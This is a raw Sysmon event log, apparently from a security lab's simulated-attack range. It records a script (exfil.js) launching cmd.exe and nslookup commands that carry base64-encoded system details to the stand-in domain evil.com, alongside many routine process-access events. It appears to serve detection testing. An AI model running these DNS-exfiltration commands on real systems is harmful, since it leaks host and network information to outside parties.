14:21:52.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.024{2E1864BB-1900-629A-7846-000000005F02}2056C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhefz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000215884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.694{00000000-0000-0000-0000-000000000000}3292<unknown process>-udpfalsefalse127.0.0.1-51312-false127.0.0.1-53domain 354300x8000000000000000215883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.693{00000000-0000-0000-0000-000000000000}3292<unknown process>-udptruefalse127.0.0.1-51312-false127.0.0.1-53domain 354300x8000000000000000215882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.693{00000000-0000-0000-0000-000000000000}3292<unknown process>-udpfalsefalse127.0.0.1-51311-false127.0.0.1-53domain 354300x8000000000000000215881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.693{00000000-0000-0000-0000-000000000000}3292<unknown process>-udptruefalse127.0.0.1-51311-false127.0.0.1-53domain 354300x8000000000000000215880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{00000000-0000-0000-0000-000000000000}4672<unknown process>-udptruefalse127.0.0.1-51306-false127.0.0.1-53domain 354300x8000000000000000215879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{00000000-0000-0000-0000-000000000000}4672<unknown process>-udpfalsefalse127.0.0.1-51305-false127.0.0.1-53domain 354300x8000000000000000215878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.258{00000000-0000-0000-0000-000000000000}1692<unknown process>-udptruefalse127.0.0.1-51296-false127.0.0.1-53domain 23542300x8000000000000000215877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.005{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlracod.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044922Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1900-629A-3607-000000006002}1968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044921Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044920Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044919Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044918Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044917Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044916Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044915Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044914Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044913Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044912Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-1900-629A-3607-000000006002}1968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044911Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.503{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1900-629A-3607-000000006002}1968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044910Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.505{0A5DF930-1900-629A-3607-000000006002}1968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044909Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:52.331{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542A80E19B1B27B92AC08AB3195D0A69,SHA256=91889CC56A52979E924D9A0055FF274B6EB9C638A7F14BD5F52297F5C2B215FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.954{2E1864BB-1901-629A-A946-000000005F02}56085040C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-AA46-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.954{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-AA46-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.954{2E1864BB-1901-629A-A846-000000005F02}23803732C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-AA46-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.957{2E1864BB-1901-629A-AA46-000000005F02}8104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-A846-000000005F02}2380C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleukpaw.tmp 2>&1 22542200x8000000000000000216437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.000{00000000-0000-0000-0000-000000000000}7360evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.875{00000000-0000-0000-0000-000000000000}3736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.788{00000000-0000-0000-0000-000000000000}6856evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.685{00000000-0000-0000-0000-000000000000}7556evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 